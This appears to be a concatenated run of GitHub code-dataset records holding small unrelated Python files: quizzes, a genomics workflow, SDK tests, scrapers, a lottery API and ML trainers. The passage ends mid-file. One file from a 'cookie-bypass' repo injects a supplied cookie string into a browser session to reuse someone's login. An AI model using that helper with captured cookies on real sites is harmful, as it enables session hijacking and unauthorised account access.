URL_VIEW_TYPES[0]","repo_name":"mapoga/FFmpeg","sub_path":"quickSeq.py","file_name":"quickSeq.py","file_ext":"py","file_size_in_byte":3615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34606690258","text":"# demander 2 nombres avec un exposant chacun puis demander le resultat (differante couleur si juste ou faux)\n\n# changer le texte de couleur\n\nclass Couleur:\n Vert= '\\033[92m' \n Bleu = '\\033[94m' \n Rouge = '\\033[91m' \n Normal = '\\033[0m' \n\n\nn1 = int(input(Couleur.Vert + \"Nombre1 sans exposant >> \"))\nexp1 = int(input(\"Exposant 1 >> \"))\n\nprint(Couleur.Bleu, n1 , \"exp\", exp1)\n\n\nn2 = int(input(Couleur.Vert + \"Nombre2 sans exposant >> \"))\nexp2 = int(input(\"Exposant 2 >> \"))\n\nprint(Couleur.Bleu, n1 , \"exp\", exp1,\"*\", n2, \"exp\", exp2, Couleur.Normal)\n\nif n1 == n2 and exp1 == exp2:\n PCreponseExp = exp1 + exp2\n PCreponseNB = n1\n REPnb = int(input(\"Resultat Nombre3 sans exposant >> \")) \n REPexp = int(input(\"Resultat exposant3 >> \"))\n \n if REPnb == PCreponseNB:\n print(Couleur.Vert, REPnb)\n else:\n print(Couleur.Rouge + REPnb)\n\n if REPexp == PCreponseExp:\n print(Couleur.Vert + \"Exposant\", REPexp)\n else:\n print(Couleur.Rouge + \"Exposant\", REPexp) \n\n\nelif n1 == n2:\n PCreponseExp = exp1 + exp2\n PCreponseNB = n1\n REPnb = int(input(\"Resultat Nombre3 sans exposant >> \")) \n REPexp = int(input(\"Resultat exposant3 >> \"))\n \n if REPnb == PCreponseNB:\n print(Couleur.Vert, REPnb)\n else:\n print(Couleur.Rouge + REPnb)\n\n if REPexp == PCreponseExp:\n print(Couleur.Vert + \"Exposant\", REPexp)\n else:\n print(Couleur.Rouge + \"Exposant\", REPexp)\n# OK\n\nelif exp1 == exp2:\n PCreponseNB1 = n1\n PCreponseNB2 = n2\n PCreponseExp = exp1\n \n REPnb1 = int(input(\"Resultat Nombre3.1 sans exposant >> \")) \n REPexp1 = int(input(\"Resultat exposant 3.1 >> \"))\n \n \n REPnb2 = int(input(\"Resultat Nombre3.2 sans exposant >> \")) \n REPexp2 = int(input(\"Resultat exposant 3.2 >> \"))\n\n \n# OK\n \n if REPnb1 == PCreponseNB1:\n Juste1NB = REPnb1\n else:\n Faux1NB = REPnb1\n\n if REPnb2 == PCreponseNB2:\n Juste2NB = REPnb2\n else:\n Faux2NB = REPnb2\n \n if Juste1NB == REPnb1 and Juste2NB == REPnb2:\n print(Couleur.Vert + \"(\",Juste1NB,\"*\",Juste2NB,\")\")\n \n elif Juste1NB != REPnb1 and Juste2NB == REPnb2:\n print(Couleur.Vert + \"(\",Couleur.Rouge, Juste1NB,\" *\",Couleur.Vert,Juste2NB,\")\")\n\n elif Juste1NB == REPnb1 and Juste2NB != REPnb2:\n print(Couleur.Vert + \"(\",Juste1NB,\" *\",Couleur.Rouge,Juste2NB,Couleur.Vert + \")\") \n\n elif Juste1NB != REPnb1 and Juste2NB != REPnb2:\n print(Couleur.Vert + \"(\",Couleur.Rouge, Juste1NB,Couleur.Vert + \"*\",Juste2NB,Couleur.Vert + \" )\") \n\n \n if REPexp1 == PCreponseExp:\n print(Couleur.Vert + \"Exposant >> \", REPexp1)\n else:\n print(Couleur.Rouge + \"Exposant >> \", REPexp1)\n\n","repo_name":"Donald2304/Program_Python","sub_path":"exposant.py","file_name":"exposant.py","file_ext":"py","file_size_in_byte":2742,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22454935240","text":"import json\nimport logging\n\nfrom collections import namedtuple\n\nfrom core import common\n\nParameters = namedtuple(\n \"Parameters\",\n [\n \"manifest_path\",\n \"multisample_profile_path\",\n \"min_inrepeat_read_pairs\",\n \"output_path\",\n \"test_params\",\n ],\n)\n\n\ndef output_results(count_table, output_path):\n header = [\"motif\", \"pvalue\", \"bonf_pvalue\", \"counts\"]\n header = \"\\t\".join(header)\n with open(output_path, \"w\") as output_file:\n print(header, file=output_file)\n for row in count_table:\n unit = row[\"unit\"]\n pvalue, bonf_pvalue = row[\"pvalue\"], row[\"bonf_pvalue\"]\n\n sample_counts = row[\"sample_counts\"]\n encoded_counts = [\"{}:{}\".format(s, c) for s, c in sample_counts.items()]\n encoded_counts = \",\".join(encoded_counts)\n print(unit, pvalue, bonf_pvalue, encoded_counts, sep=\"\\t\", file=output_file)\n\n\ndef run(params):\n with open(params.multisample_profile_path, \"r\") as profile_file:\n multisample_profile = json.load(profile_file)\n count_table = common.generate_table_with_irr_pair_counts(\n multisample_profile[\"Counts\"]\n )\n\n logging.info(\"Loaded %i regions\", len(count_table))\n\n logging.info(\"Normalizing counts\")\n sample_stats = multisample_profile[\"Parameters\"]\n common.depth_normalize_counts(sample_stats, count_table)\n\n logging.info(\"Filtering counts\")\n count_table = common.filter_counts_by_magnitude(\n count_table, params.min_inrepeat_read_pairs\n )\n\n logging.info(\"%i regions left after filtering\", len(count_table))\n manifest = common.load_manifest(params.manifest_path)\n sample_status = common.extract_case_control_assignments(manifest)\n\n logging.info(\"Comparing counts\")\n common.compare_counts(params.test_params, sample_status, count_table)\n logging.info(\"Correcting p-values\")\n common.correct_pvalues(count_table)\n output_results(count_table, params.output_path)\n logging.info(\"Done\")\n","repo_name":"Illumina/ExpansionHunterDenovo","sub_path":"scripts/casecontrol/motifworkflow.py","file_name":"motifworkflow.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"61"} +{"seq_id":"23761317657","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport uuid\nimport six\nfrom ecl.tests.functional import base\n\n\nclass TestKeypair(base.BaseFunctionalTest):\n\n @classmethod\n def test_01_import(cls):\n cls.NAME = uuid.uuid4().hex\n keypair = cls.conn.baremetal.create_keypair(name=cls.NAME)\n print(keypair)\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n assert isinstance(keypair.private_key, six.string_types)\n\n @classmethod\n def test_02_list(cls):\n keypairs = list(cls.conn.baremetal.keypairs())\n for keypair in keypairs:\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n\n def test_show_03(self):\n keypair = self.conn.baremetal.get_keypair(self.NAME)\n self.assertIsInstance(keypair.public_key, six.string_types)\n self.assertIsInstance(keypair.fingerprint, six.string_types)\n self.assertIsInstance(keypair.name, six.string_types)\n\n def test_03_delete(self):\n self.conn.baremetal.delete_keypair(self.NAME)\n\n @classmethod\n def test_05_create(cls):\n cls.NAME2 = uuid.uuid4().hex\n keypair = cls.conn.baremetal.create_keypair(\n name=cls.NAME2,\n public_key=\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAQQCtzdf5vKNNSoeMfTUUj65eJLMjXfIbtc2GQn6+EEISHX6vjBzsTMdToQJEhgg+5rYlb5tc2mvPYNbPDIJV8OyV\")\n print(keypair)\n assert isinstance(keypair.fingerprint, six.string_types)\n assert isinstance(keypair.name, six.string_types)\n assert isinstance(keypair.public_key, six.string_types)\n\n def test_06_delete(self):\n self.conn.baremetal.delete_keypair(self.NAME2)\n","repo_name":"nttcom/eclsdk","sub_path":"ecl/tests/functional/baremetal/test_keypair.py","file_name":"test_keypair.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"12596200907","text":"# 2) A number starting from 1 can be got by either multiplying 3 or adding 5 to it. Given a number, find the sequence of operations to get it or say it’s not possible.\n# Eg: 13 = 1 * 3 + 5 + 5, 15 ; Not possible\n\ndef check(n):\n if n == 1 or n == 6:\n return True\n if n < 1:\n return False\n\n retvalue = []\n\n if n % 3 == 0:\n if check(n/3):\n\n return True\n if check(n-5):\n return True\n\n return False\n\n\nif __name__ == '__main__':\n num = 11\n\n print(check(num))\n","repo_name":"adwaithkj/sortandsearchalgos","sub_path":"GFG/mul3add5dp.py","file_name":"mul3add5dp.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41638495382","text":"\"\"\"\nCreator: Flokk___\nDate: 18/11/2022\nVersion: V1.0\n\nPurpose:\n\"\"\"\n\n# IMPORT: utils\nimport os\nimport json\n\nimport datetime\n\n# IMPORT: deep learning\nimport torch\n\n# IMPORT: reinforcement learning\nfrom stable_baselines3 import DQN, A2C\nfrom stable_baselines3.common.callbacks import CheckpointCallback\n\nfrom stable_baselines3.common.vec_env import VecFrameStack\nfrom stable_baselines3.common.env_util import make_atari_env\n\n# IMPORT: project\nimport paths\n\n\nclass Trainer:\n _MODELS = {\"DQN\": DQN, \"A2C\": A2C}\n _DEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\n def __init__(self, game_id, model_name, weights_path=None):\n # Save paths\n creation_time = datetime.datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\")\n folder_name = f\"{creation_time}_{game_id}\"\n\n self._save_paths = {\n \"model_path\": os.path.join(paths.MODELS_PATH, folder_name),\n \"checks_path\": os.path.join(paths.MODELS_PATH, folder_name, \"checkpoints\"),\n }\n\n for key, path in self._save_paths.items():\n if not os.path.exists(path):\n os.makedirs(path)\n\n # Environment\n self._env = make_atari_env(game_id, n_envs=16)\n self._env = VecFrameStack(self._env, n_stack=4)\n\n # Model\n tensorboard_path = os.path.join(paths.MODELS_PATH, folder_name, \"tensorboard\")\n\n if weights_path:\n self._model = self._MODELS[model_name].load(weights_path, env=self._env,\n tensorboard_log=tensorboard_path,\n device=self._DEVICE)\n else:\n with open(paths.CONFIG_PATH) as config_file:\n model_config = json.load(config_file)\n self._model = self._MODELS[model_name](**model_config[model_name], env=self._env,\n tensorboard_log=tensorboard_path,\n device=self._DEVICE)\n\n def launch(self, nb_iter):\n checks = CheckpointCallback(save_freq=(nb_iter // self._env.num_envs) // 10,\n save_path=self._save_paths[\"checks_path\"], name_prefix=\"model\")\n\n self._model.learn(total_timesteps=nb_iter, progress_bar=True,\n tb_log_name=\"run\", callback=checks, reset_num_timesteps=False)\n\n self._model.save(path=os.path.join(self._save_paths[\"model_path\"], \"model\"))\n","repo_name":"flokk-dev/RL_gym","sub_path":"src/train/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"39510740361","text":"import sys\ninput = sys.stdin.readline\n\narray = []\nanswer = \"\"\n\ndef scan(n, row, col):\n haveZero = False\n haveOne = False\n result = \"\"\n \n for i in range(row, row + n):\n for j in range(col, col + n):\n if array[i][j] == '1':\n haveOne = True\n else:\n haveZero = True\n if haveZero and haveOne:\n return False, result\n if haveOne:\n result = \"1\"\n else:\n result = \"0\" \n\n return True, result\n\ndef solve(n, row, col):\n global answer\n \n isSame, result = scan(n, row, col) \n\n if isSame:\n answer += result\n else:\n n //= 2\n answer += \"(\"\n solve(n, row, col) \n solve(n, row, col + n) \n solve(n, row + n, col) \n solve(n, row + n, col + n) \n answer += \")\"\n\n\nif __name__ == \"__main__\":\n N = int(input())\n for _ in range(N):\n val = input()\n array.append(val)\n solve(N, 0, 0)\n print(answer)","repo_name":"jwYunn/Baekjoon_Algorithm","sub_path":"baekjoon_1992.py","file_name":"baekjoon_1992.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33253292007","text":"import app.settings as SET\nfrom app.functions import *\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nfrom bs4 import BeautifulSoup\n\nimport sqlite3,time\n\ndef get_link(getLink_link:str):\n getLink_Jobs_ClassName = SET.getLink_Jobs_ClassName\n getLink_Jobs_CompanyName = SET.getLink_Jobs_CompanyName\n getLink_xpath_nextPage_href = SET.getLink_xpath_nextPage_href\n \n con = sqlite3.connect(SET.MAIN_DATABASE)\n cursor = con.cursor()\n \n X,Y = ScreenSize()\n\n driver = webdriver.Firefox(\"\") \n driver.set_window_position(0, 0)\n driver.set_window_size(int(X*0.33), int(Y*0.66))\n\n driver.get(getLink_link)\n\n time.sleep(10)\n driver.refresh()\n time.sleep(5)\n\n #cockies to eat ...Es muss 'Alles akzeptieren' heißen. \n driver.find_element(by=By.XPATH, value= \"//span[text()='Alles akzeptieren']\").click()\n\n while True: \n html_icerigi = driver.page_source\n soup = BeautifulSoup(html_icerigi, 'lxml')\n\n JobsList = soup.find_all('div',{\"class\":getLink_Jobs_ClassName} )\n \n if len(JobsList) == 0:\n FatherDIV = [i for i in soup.find_all('div') if len(i) == 25]\n\n if FatherDIV: \n for TargetDIV in FatherDIV[0]:\n getLink_Jobs_ClassName = \" \".join([c for c in TargetDIV.get(\"class\")])\n break \n \n else:\n getLink_Jobs_ClassName = \"\"\n driver.quit()\n raise TypeError(\"Error: Keine 25 Jobs gefunden. Ich versuche es mit dem naechsten link.\")\n \n JobsList = soup.find_all('div',{\"class\":getLink_Jobs_ClassName} ) \n\n\n\n\n #Looping alle links in der offenen Seite\n for Job in JobsList:\n JobArticle = Job.find(\"div\").find('article')\n elementsA = JobArticle.find_all('a')\n\n companyName = Job.find(\"div\",{\"class\":getLink_Jobs_CompanyName})\n \n if companyName:\n companyName = companyName.text\n else:\n companyName = \"\"\n\n if len(elementsA) == 3:\n href1= elementsA[0]['href'] #Andere Jobs von der selben Firma\n href2= elementsA[1]['href'] #link der Stelle\n href3= elementsA[2]['href'] #link der Stelle\n else: \n href1 = \"\\n\".join([link['href'] for link in elementsA])\n cursor.execute(\"INSERT INTO failedLinks VALUES(?,?)\",(href1,\"\"));con.commit() #Speichert die nicht passenden links\n continue\n\n cursor.execute(\"INSERT INTO links VALUES(?,?,?,?)\",(href1,href2,href3,companyName));con.commit() #Speichert das link wenns passt\n \n href = \"\"\n xpath = getLink_xpath_nextPage_href\n element1 = driver.find_element(by=By.XPATH, value=xpath)\n if element1:\n href = element1.get_attribute(\"href\")\n if href == None:\n driver.quit()\n raise ValueError(\"Es geht nicht mehr weiter. Ich fange mit dem naechsten link an..\")\n else:\n driver.quit()\n raise TypeError(\"Ich kann wegen einem Fehler nicht auf die naechste seite\")\n\n driver.get(href) \n \n\n\n\n\n \n ","repo_name":"KoalasCodeBook/Stepstone-Bot","sub_path":"app/getlink.py","file_name":"getlink.py","file_ext":"py","file_size_in_byte":3308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22738802863","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n##########\n## russianstemmer.py Version 1.0 (2015-02-12)\n##\n## Original author: Matthew Menzenski (menzenski@ku.edu)\n##\n## License: CC-BY-4.0 ( https://creativecommons.org/licenses/by/4.0/ )\n##########\n\nimport nltk, codecs\nfrom unicodedata import category\nfrom nltk.stem import SnowballStemmer\n\n# text you'd like to stem\ninput_file = 'WarAndPeaceFull_ignore.txt'\n\n# place to save the stemmed text\nresults_file = 'stemmedWarAndPeace_ignore.txt'\n\n# list of all stemmed tokens\nall_stems = []\n\npunct = [u\"\"\".,;:'\"`-„”()[]1234567890\"\"\"]\n\ndef get_stems(rus_text):\n unstemmed_text = codecs.open(rus_text, encoding=\"utf8\").read()\n\n # strip punctuation marks\n unstemmed_text = ''.join(\n ch for ch in unstemmed_text if category(ch)[0] != 'P')\n \n tokens = nltk.word_tokenize(unstemmed_text)\n stemmer = SnowballStemmer(\"russian\")\n\n for token in tokens:\n bare_stem = stemmer.stem(unicode(token))\n all_stems.append(bare_stem)\n\ndef write_to_file(target_file, unicode_list):\n with codecs.open(target_file, \"a\", encoding=\"utf-8\") as stream:\n for unicode_item in unicode_list:\n stream.write(\"%s \" % unicode_item)\n\ndef main():\n get_stems(input_file)\n #for stem in all_stems:\n # print stem.encode('utf8'),\n write_to_file(results_file, all_stems)\n\nif __name__ == '__main__':\n main()\n","repo_name":"menzenski/python-tools","sub_path":"russian-stemmer/russianstemmer.py","file_name":"russianstemmer.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24437110217","text":"from selenium import webdriver\n\n\ndef load_driver():\n \"\"\"Create the webdriver to display custom sites.\"\"\"\n options = webdriver.FirefoxOptions()\n options.binary_location = \"/usr/bin/firefox\"\n return webdriver.Firefox(firefox_options=options)\n\n\ndef open(url, cookie_string, secure=True):\n \"\"\"Open given URL with \"\"\"\n driver = load_driver()\n\n # force wait for page load\n # generic, may not work on heavy pages / low internet speed\n driver.implicitly_wait(10)\n\n # open full-url with correct scheme\n protocol = 'http'\n if secure:\n protocol += 's'\n driver.get(f'{protocol}://{url}')\n\n # re-set incoming cookies\n driver.delete_all_cookies()\n for c in cookie_string.strip().split(';'):\n (name, value) = c.split('=')\n driver.add_cookie({'name': name, 'value': value})\n\n driver.refresh()\n","repo_name":"yanmarques/cookie-bypass","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11519149246","text":"from flask_restful import Resource\nfrom Lottery.rest_flask_api.scrapper.common_game.draw_scrapper import get_draw as get_draw_online\nfrom Lottery.rest_flask_api.resource.quickpick import get_quick_pick\nfrom Lottery.rest_flask_api.scrapper.common_game.history_scrapper import get_history\nfrom Lottery.rest_flask_api.cluster.draw_cluster import update_game_draw_result, update_all_games_draw_result\nfrom Lottery.rest_flask_api.resource.game_info import GameInfo\n\n\nclass CommonGameResources(Resource):\n def get(self, game_name, function=\"info\") -> dict:\n\n game_info = GameInfo.LOTTO\n\n if game_name == \"all\" and function == \"draw_update\":\n return {\"response\": update_all_games_draw_result()}\n else:\n for this_game in GameInfo:\n try:\n if this_game.value[0]['game_name'] == game_name:\n game_info = this_game\n break\n except KeyError:\n if this_game.value['game_name'] == game_name:\n game_info = this_game\n break\n\n if function == \"info\":\n try:\n return game_info.value[0]\n except KeyError:\n return game_info.value\n elif function == \"draw\":\n try:\n return get_draw_online(game_info.value[0][\"latest_draw_result_url\"])\n except KeyError:\n return get_draw_online(game_info.value[\"latest_draw_result_url\"])\n elif function == \"draw_update\":\n return update_game_draw_result(game_name)\n elif function == \"history\":\n try:\n return get_history(game_info.value[0][\"draw_history_url\"])\n except KeyError:\n return get_history(game_info.value[\"draw_history_url\"])\n elif function == \"quick_pick\":\n return get_quick_pick(game_name)\n else:\n try:\n return {function: dict(game_info.value[0])[function]}\n except KeyError:\n return {function: dict(game_info.value)[function]}\n","repo_name":"wastedMynd/pythonProject","sub_path":"Lottery/rest_flask_api/resource/common_game.py","file_name":"common_game.py","file_ext":"py","file_size_in_byte":2215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"25633242993","text":"class SinglyLinkedListNode:\n\n def __init__(self,data):\n self.data=data\n self.next=None\n\n#problem\ndef getNode(head, positionFromTail):\n newArray=list()\n\n current=head\n\n while current!=None:\n newArray.append(current.data)\n current=current.next\n\n return newArray[len(newArray)-1-positionFromTail]\n\n\ndef printLinkedList(node):\n current=node\n while current != None:\n print(current.data)\n current=current.next\n\n\nhead = SinglyLinkedListNode(16)\nhead.next=SinglyLinkedListNode(13)\nhead.next.next=SinglyLinkedListNode(1)\nhead.next.next.next=SinglyLinkedListNode(7)\nhead.next.next.next.next=SinglyLinkedListNode(9)\n\n\nprint(getNode(head,2))\n","repo_name":"Burakdal/AlgorithmPractise","sub_path":"LinkedList/problem_7.py","file_name":"problem_7.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"6224465282","text":"##要求:用户可以通过拖拽控件中任意地方实现改变控件位置\n\n\nfrom PyQt5.Qt import *\nimport sys\n\n\nclass window(QWidget):\n def __init__(self):\n super().__init__()\n self.move_flage = False\n\n\n def mousePressEvent(self, QMouseEvent) :\n '''\n 确定鼠标第一次按下的点\n 确定窗口当前所在的原始点\n '''\n\n #确定控件相对于当前窗口的原始点\n if QMouseEvent.button() == Qt.LeftButton:\n self.move_flage = True\n self.mouse_x = QMouseEvent.globalX()\n self.mouse_y = QMouseEvent.globalY()\n\n #确定鼠标第一次按下的点\n self.origin_x = self.x()\n self.origin_y = self.y()\n\n def mouseMoveEvent(self, QMouseEvent):\n if self.move_flage:\n #计算移动向量\n move_x = QMouseEvent.globalX() - self.mouse_x\n move_y = QMouseEvent.globalY() - self.mouse_y\n\n #最后的目标位置\n dest_x = self.origin_x + move_x\n dest_y = self.origin_y + move_y\n self.move(dest_x, dest_y)\n\n\n def mouseReleaseEvent(self, QMouseEvent) :\n #释放鼠标按键\n self.move_flage = False\n\n\napp = QApplication(sys.argv)\nwindow = window()\nwindow.resize(500, 500)\nwindow.setMouseTracking(True)\nwindow.show()\nsys.exit(app.exec())\n\n\n","repo_name":"ywkangkai/PythonGUI","sub_path":"GUI/QWidgt/事件机制/案例/案例5.py","file_name":"案例5.py","file_ext":"py","file_size_in_byte":1375,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"27850195669","text":"import numpy as np\nimport tensorflow as tf\n\nfrom Complex_Model.Complex_Net import Complex_Model\nfrom Model.Net import Model\nfrom Tools.data_load import data_load\nfrom utils.config import cfg\nfrom utils.show_progress_bar import view_bar\n\ntrain_dataType = ''\ntest_dataType = ''\nckpt_path=''\n\ntrain_images,labels, test_images, test_labels = data_load(train_dataType, test_dataType)\nxs = tf.placeholder(tf.float32, [cfg.batch_size, 64,64,2])\nys = tf.placeholder(tf.float32, [cfg.batch_size, 1])\n# xs_ = tf.complex(xs, 0.0)\n\ncomplex_nn = Complex_Model()\ncomplex_out = complex_nn.build_net(inputs=xs)\n\nnn = Model()\nsiamese_out = nn.build_net(complex_out)\nnn_out = tf.layers.dense(siamese_out, units=1, activation=tf.nn.sigmoid, name='out')\n\nglobal_step = tf.Variable(0,trainable=False)\nlearing_rate = tf.train.exponential_decay(cfg.lr,global_step,cfg.decay_step,1,staircase=False)\nacc = nn.acc(logits=nn_out, labels=ys)\nloss =nn.loss(logits=nn_out, labels=ys)\noptimizer = tf.train.AdamOptimizer(learing_rate)\ntrain_step = optimizer.minimize(loss)\nsess = tf.Session()\nsaver = tf.train.Saver(max_to_keep=20)\ninit = tf.global_variables_initializer()\n\nsess.run(init)\nfor epoch in range(cfg.epoch_num):\n tr_loss = []\n tr_acc = []\n for start, end in zip(range(0, len(train_images), cfg.batch_size),\n range(cfg.batch_size, len(train_images), cfg.batch_size)):\n rand = np.random.choice(len(train_images), cfg.batch_size)\n x, y = (train_images[rand], labels[rand])\n _, _loss, _acc = sess.run([train_step, loss, acc], feed_dict={xs: x, ys: y})\n # if (start/cfg.batch_size) %100 == 0:\n # print(_loss, _acc)\n tr_loss.append(_loss)\n tr_acc.append(_acc)\n view_bar(start / cfg.batch_size, len(train_images) / cfg.batch_size, epoch, cfg.epoch_num)\n\n\n print(\"\\n\")\n print('epoch %d: acc %.3f sigmoid_loss %.6f' % (epoch, np.mean(tr_acc), np.mean(tr_loss)))\n te_loss = []\n te_acc = []\n for start, end in zip(range(0, len(test_images), cfg.batch_size),\n range(cfg.batch_size, len(test_images), cfg.batch_size)):\n x, y = (test_images[start:end], test_labels[start:end])\n _loss, _acc = sess.run([loss, acc], feed_dict={xs: x, ys: y})\n te_loss.append(_loss)\n te_acc.append(_acc)\n print('test : acc %.3f sigmoid_loss %.6f' % (np.mean(te_acc), np.mean(te_loss)))\n\n saver.save(sess, ckpt_path, global_step=epoch)\n\n\n\n","repo_name":"swJiang/CCN-CTN","sub_path":"CCN_train.py","file_name":"CCN_train.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74407911555","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom flask_googlemaps import GoogleMaps\nfrom flask_googlemaps import Map, icons\nimport googlemaps\nimport requests, json\n\napp = Flask(__name__, template_folder=\".\")\nGoogleMaps(app)\ngmaps = googlemaps.Client(key='APIKEY')\njsonget = requests.get('http://127.0.0.1/')\ndata = json.loads(jsonget.content)\n\nmarks = []\nfires = []\nfires_n = 0\npeople_n = 0\ndatacity = []\nposla = 0\nposlo = 0\nlan = 0\nlon = 0\nfor i in data[\"path\"]:\n marks.append({\n\t'icon': 'http://maps.google.com/mapfiles/ms/icons/green-dot.png',\n\t'lat': i[0],\n\t'lng': i[1],\n\t'infobox': \"Person phone?\"\n })\n people_n += 1\n\nlan=data[\"path\"][0][0]\nlon=data[\"path\"][0][1]\n\nfor i in data[\"fires\"]:\n location = gmaps.reverse_geocode((i[\"coords\"][0],i[\"coords\"][1]))\n datacity.append(location[0][\"formatted_address\"])\n fires.append({\n 'stroke_color': '#8B0000',\n 'stroke_opacity': 1.0,\n 'stroke_weight': 1,\n 'fill_color': '#8B0000',\n 'fill_opacity': 0.2,\n 'center': {\n 'lat': i[\"coords\"][0],\n 'lng': i[\"coords\"][1]\n },\n 'radius': i[\"radius\"],\n 'infobox': \"fire area\"\n })\n fires_n += 1\n \n\n@app.route(\"/\")\ndef mapview():\n\tmap = Map(\n\tidentifier=\"map\",\n\tlat=lan,\n\tlng=lon,\n\tcluster=True,\n cluster_gridsize=70,\n cluster_imagepath=\"static/images/m\",\n style=\"width:100%;height:100%\",\n\tmarkers=marks,\n\tcircles=fires,\n\t)\n\treturn render_template('example.html', map=map, count=fires_n, countp=people_n, countpn=people_n, datacity=datacity)\n\n@app.route(\"/set\", methods=['POST'])\ndef set():\n name=request.form['list']\n global lon, lan\n lan=data[\"fires\"][int(name)][\"coords\"][0]\n lon=data[\"fires\"][int(name)][\"coords\"][1]\n return redirect(url_for('mapview'))\n\nif __name__ == \"__main__\":\n\tapp.run(debug=True)\n","repo_name":"Aifryz/FireHelper","sub_path":"firefighters/firehelper/fireHelper.py","file_name":"fireHelper.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"8901908299","text":"from typing import List\n\n# URL to the problem solved below:\n# https://leetcode.com/problems/best-time-to-buy-and-sell-stock-with-transaction-fee/description/\n\nclass Solution:\n\n # This was my first aproach, but it was not working properly\n def maxProfitNotWorking(prices: List[int], fee: int) -> int:\n result = []\n bought = False\n\n for day_price in range(0,len(prices)):\n if not bought and (day_price != len(prices)-1):\n result.append(prices[day_price])\n bought = True\n elif bought and (abs(result[-1] - prices[day_price]) - fee) > 0:\n result.append(prices[day_price])\n bought = False\n\n return sum([(result[i + 1] - result[i]) - fee for i in range(0, len(result)-1, 2)])\n\n # This solution works properly and beats 89.61% of users lets gooooo\n def maxProfit(self, prices: List[int], fee: int) -> int:\n notHold, hold = 0, -prices[0]\n for i in range(1, len(prices)):\n hold = max(hold, notHold - prices[i])\n notHold = max(notHold, hold + prices[i] - fee)\n return notHold","repo_name":"Wastelander777/personal_development","sub_path":"714. Best Time to Buy and Sell Stock with Transaction Fee.py","file_name":"714. Best Time to Buy and Sell Stock with Transaction Fee.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40530323047","text":"\"\"\"Some useful statistics methods.\"\"\"\nfrom __future__ import division\n\nimport math\nfrom math import sqrt, exp, log\nimport copy\n\nNaN = float(\"nan\")\n\n## Sample statistics\n\ndef mean(xs):\n \"\"\"Sample mean.\"\"\"\n if len(xs) > 0:\n return sum(xs) / len(xs)\n else:\n return NaN\n\ndef var(xs):\n \"\"\"Sample variance.\"\"\"\n if len(xs) > 1:\n m = mean(xs)\n xs2 = [(x-m)**2 for x in xs]\n return sum(xs2) / (len(xs) - 1)\n else:\n return NaN\n\ndef stddev(xs):\n \"\"\"Sample standard deviation.\"\"\"\n return sqrt(var(xs))\n\ndef moment(k, xs):\n \"\"\"Sample n-th central moment. Note: not unbiased.\"\"\"\n if len(xs) > 0:\n m = mean(xs)\n xs_k = [(x-m)**k for x in xs]\n return sum(xs_k) / len(xs)\n else:\n return NaN\n\ndef skewness(xs):\n \"\"\"Sample skewness.\"\"\"\n return moment(3, xs) / var(xs)**(3/2)\n\ndef kurtosis(xs):\n \"\"\"Sample kurtosis.\"\"\"\n return moment(4, xs) / var(xs)**2 - 3\n\ndef _get_index(xs, n):\n \"\"\"Get a fractionally indexed item by interpolation.\"\"\"\n if len(xs) == 0:\n return NaN\n assert 0 <= n <= len(xs) - 1\n if n == len(xs) - 1:\n return xs[-1]\n i = int(n // 1) # Integral part\n f = n % 1 # Fractional part\n \n return (1-f) * xs[i] + f * xs[i+1]\n\ndef quantiles(xs, *quantiles):\n \"\"\"Find a set of quantiles in data.\"\"\"\n # NOTE: Will be inefficient for large len(xs)\n xs = copy.copy(xs)\n xs.sort()\n \n return [_get_index(xs, quant * (len(xs) - 1)) for 